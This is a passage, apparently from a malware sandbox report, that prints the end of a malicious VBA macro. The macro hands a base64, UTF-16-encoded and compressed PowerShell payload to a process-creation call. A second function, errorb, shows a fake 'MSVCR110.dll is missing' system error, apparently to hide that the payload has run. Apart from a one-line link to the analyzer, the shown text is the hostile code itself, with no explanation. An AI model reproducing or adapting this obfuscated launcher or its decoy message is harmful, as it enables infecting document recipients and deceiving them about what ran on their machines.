& "AdwBBAC8AOABPAFUAMgByAHUAdwBtAGwAagBCAHoAKwA1AE0AVQBQAFoAagAxAG0AaABtAFkAWABYAGEAVAA0ACsARABMADcAdQA5AC8AKwBlAHQAZgBQAC8AMwB6ADAAOABPAGgAKwBhAHgAbABiAFAATgBKACsAZQBWAFgAZAA3ADkANQAzAHYALwA2AGUASQBoAFkARgB2ADkANgB2ADQAcwBQADUAYQBaAHEAOQByACsANgBkAFIASQAyAG0AKwBlAGYANgByADMANAB0ADMAcAAzAHgASgByAHQAaAByAEYAUABuADcAMgBzAFMAbgBiAEgAVgBkAFAAaQA3AFcAMgBXAEoASgB2AHEAMAAyAGYAMQB0AEkAawBQAFQAYgBhAHIASABuAGYAWQBwAFAAMAAwAGIAZQB0AHcAdgAvAC8AMAB1AGQAcQB4AFgAYgByAGoAdgArAHYAbgAzAFIATQAvADcALwBQAFQAdgAzAC8AcQBmAC8ALwBYAC8AdwBNAD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==", Null, objConfig, intProcessID
             End Function


Public Function errorb() As Variant
MsgBox "The program can't decrypt content because MSVCR110.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbCritical, "Protected Mode, System Error"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.